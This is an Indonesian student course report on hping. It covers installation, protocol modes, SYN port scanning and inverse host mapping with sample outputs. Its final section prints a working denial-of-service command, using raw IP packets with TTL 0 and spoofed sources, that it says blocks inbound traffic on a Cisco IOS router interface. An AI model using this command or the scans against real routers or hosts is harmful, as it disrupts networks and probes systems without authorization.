Analisis Keamanan Jaringan Internet Menggunakan Hping

Analisis Keamanan Jaringan Internet Menggunakan Hping

Analisis Keamanan Jaringan Internet Menggunakan Hping

Analisis Keamanan Jaringan Internet Menggunakan Hping
Analisis Keamanan Jaringan Internet Menggunakan Hping

Latar Belakang Masalah
Pada era global ini, keamanan sistem informasi berbasis Internet harus
sangat diperhatikan, karena jaringan komputer Internet yang sifatnya publik dan
global pada dasarnya tidak aman. Pada saat data terkirim dari suatu terminal asal
menuju ke terminal tujuan dalam Internet, data itu akan melewati sejumlah terminal
yang lain yang berarti akan memberi kesempatan pada user Internet yang lain untuk
menyadap atau mengubah data tersebut.
Sistem keamanan jaringan komputer yang terhubung ke Internet harus
direncanakan dan dipahami dengan baik agar dapat melindungi sumber daya yang
berada dalam jaringan tersebut secara efektif.
Berdasarkan uraian di atas, penulis tertarik untuk mempelajari cara untuk
mengamankan suatu sistem dan jaringan komputer. Oleh karena itu, pada proyek
akhir kuliah Keamanan Sistem Informasi (EC-5010) ini, penulis mengambil bahan
mengenai keamanan jaringan internet.
* Hping
Hping adalah sebuah TCP/IP assembler. Tidak seperti ping command yang hanya
dapat mengirim ICMP echo request, hping juga dapat mengirim paket TCP, UDP,
ICMP, dan RAW-IP protocols. Hping dapat digunakan untuk berbagai macam
keperluan, yaitu:
• Mengetes firewall
• Port scanning
• Network testing, dengan menggunakan protokol yang berbeda-beda
• Remote OS fingerprinting
• Remote uptime guessing
• TCP/IP stacks auditing
• Traceroute
• Manual path MTU discovering
* Instalasi Hping
Program hping dapat diperoleh secara gratis dengan cara mendownloadnya
pada situs www.hping.org
Nama file yang didapatkan adalah hping2.tar.gz. File dalam bentuk ini tidak
dapat langsung diinstall, untuk dapat menginstalnya file ini harus didecompreesed terlebih dahulu. Perintah yang digunakan untuk mendecompreesed file tersebut
adalah gunzip, jadi untuk mendecompreesed file hping2.tar.gz digunakan perintah
seperti berikut:
[root@localhost root]#gunzip hping2.tar.gz
Setelah perintah tersebut diberikan maka file hping2.tar.gz akan berubah
menjadi hping2.tar , bentuk file ini juga masih belum dapat digunakan, untuk dapat
menggunakannya harus diketikkan perintah seperti berikut:
[root@localhost root]#tar xvf hping2.tar
Setelah perintah tersebut diketikkan maka semua file (biasanya dibuat dalam
satu folder, dalam hal ini folder hping2) sudah dapat diakses, untuk menginstall
program hping, harus diketikkan perintah berikut pada folder hping2:
[root@localhost hping2]#./configure
[root@localhost hping2]#make
[root@localhost hping2]#make install
Apabila tidak bermasalah maka program hping sudah dapat dijalankan.
* Protokol-protokol Yang Dapat Digunakan
TCP adalah default protocol pada program hping, secara default hping akan
mengirim TCP headers ke port 0 host target dengan winsize 64 dan tanpa adanya
TCP flag yang on. Biasanya ini adalah cara yang terbaik untuk melakukan hide ping,
dan sangat berguna ketika target dilindungi firewall yang tidak memperbolehkan
ICMP untuk lewat dan juga dengan mengirim TCP nullflag ke port 0 mempunyai
kemungkinan yang cukup besar untuk tidak tercatat pada target.
Selain protokol TCP, protokol lainnya yang dapat digunakan untuk mengirim
paket ke target adalah sebagai berikut:
Ø AW IP
Pada mode ini hping akan mengirim paket IP yang sama seperti paket yang
dikirimkan dari sebuah aplikasi, sehingga taget akan mengira bahwa paket yang
dikirimkan adalah sebuah paket dari sebuah aplikasi.
Apabila diiginkan untuk mengirim paket IP ke target maka perintah yang harus
diketikkan adalah sebagai berikut:
[root@localhost hping2]#hping –0 [target host] [option]
Ø ICMP
Pada mode ini, secara default hping akan mengirim ICMP echo-request, tetapi
kita dapat juga untuk megeset tipe-tipe ICMP yang lain denagn menggunakan –
icmptype –icmpcode
Apabila diiginkan untuk mengirim paket ICMP ke target maka perintah yang
harus diketikkan adalah sebagai berikut:
[root@localhost hping2]#hping –1 [target host]
Ø UDP
Pada mode ini, secara default hping akan mengirim paket UDP ke port 0 target
host. UDP header dapat diatur dengan menggunakan –baseport , –destport, —
keep.
Apabila diiginkan untuk mengirim paket UDP ke target maka perintah yang
harus diketikkan adalah sebagai berikut:
[root@localhost hping2]#hping –2 [target host] [option]
* Fungsi-fungsi Hping
v Port Scanning
Dengan menscan port taget host, kita dapat mengetahui port-port yang terbuka
pada target host. Untuk dapat menscan port target host, kita kirim paket TCP dengan
flag SYN on ke target host yang ingin discan portnya. Apabila port target membalas
dengan flag SA maka port tersebut terbuka sedangakan apabila port target membalas
dengan flag RA maka port tersebut tertutup. Berikut ini adalah contoh dari port
scanning :
[root@thomas sbin]# hping 152.102.20.184 -S -p ++22
HPING 152.102.20.184 (eth0 152.102.20.184): S set, 40 headers + 0 data bytes
len=46 ip=152.102.20.184 ttl=128 id=56775 sport=22 flags=RA seq=0 win=0 rtt=0.5 ms
len=46 ip=152.102.20.184 ttl=128 DF id=56776 sport=23 flags=SA seq=1 win=16616 rtt=0.6 ms
len=46 ip=152.102.20.184 ttl=128 id=56777 sport=24 flags=RA seq=2 win=0 rtt=0.5 ms
len=46 ip=152.102.20.184 ttl=128 DF id=56778 sport=25 flags=SA seq=3 win=16616 rtt=0.5 ms
len=46 ip=152.102.20.184 ttl=128 id=56779 sport=26 flags=RA seq=4 win=0 rtt=0.5 ms
Dari hasil scanning dari alamat IP 152.102.20.184 dapat terlihat bahwa port
23 dan port 25 terbuka, sedangkan port 22, 24, 26 tertutup.
ü Inverese Mapping
Inverse mapping dilakukan untuk mengetahui host yang aktif atau tidak. Cara
untuk melakukan Inverse mapping adalah mengirimkan paket TCP dengan mengeset
flag reset. Apabila tidak didapatkan respon maka dapat disimpulkan bahwa host
tersebut aktif, tetapi apabila mendapat respon “ICMP host unreachable” maka dapat
disimpulkan bahwa IP address tujuan tidaklah digunakan. Berikut ini adalah contoh
dari inverse mapping:
[root@thomas sbin]# hping 152.102.20.183 -R
HPING 152.102.20.183 (eth0 152.102.20.183): R set, 40 headers + 0 data bytes
ICMP Host Unreachable from ip=152.102.20.183 name=UNKNOWN
ICMP Host Unreachable from ip=152.102.20.183 name=UNKNOWN
ICMP Host Unreachable from ip=152.102.20.183 name=UNKNOWN
ICMP Host Unreachable from ip=152.102.20.183 name=UNKNOWN
ICMP Host Unreachable from ip=152.102.20.183 name=UNKNOWN
Dari contoh di atas dapat disimpulkan bahwa host dengan IP 152.102.20.183
tidaklah aktif.
[root@thomas sbin]# hping 152.102.20.184 -R
HPING 152.102.20.184 (eth0 152.102.20.184): R set, 40 headers + 0 data bytes
— 152.102.20.184 hping statistic —
4 packets tramitted, 0 packets received, 100% packet loss
round-trip min/avg/max = 0.0/0.0/0.0 ms
Dari contoh di atas dapat disimpulkan bahwa host dengan IP 152.102.20.184
dalam keadaan aktif
ü IOS Exploit Test
Berikut ini contoh yang menunjukkan kelemahan pada IOS router (IOS
exploit). Hal ini dilakukan dengan mengirimkan paket IP dengan ttl=0, ipproto =
53/55/77/103 , count=76, data=26. Berikut ini adalah perintah yang dapat
menyebabkan interface router yang menjadi target tidak dapat menerima inbound
packet(pada contoh ini router memiliki alamat IP 10.7.7.3 sedangkan terminal yang
dipakai untuk “menyerang” router memiliki alamat IP 10.7.7.5):
[root@thomas sbin]# hping 10.7.7.3 –rawip –rand-source –ttl 0 –ipproto 55 –count 76 –
-interval u250 –data 26
HPING 10.7.7.3 (eth0 10.7.7.3): raw IP mode set, 20 headers + 26 data bytes
— 10.7.7.3 hping statistic —
76 packets tramitted, 0 packets received, 100% packet loss
round-trip min/avg/max = 0.0/0.0/0.0 ms

Baca Juga :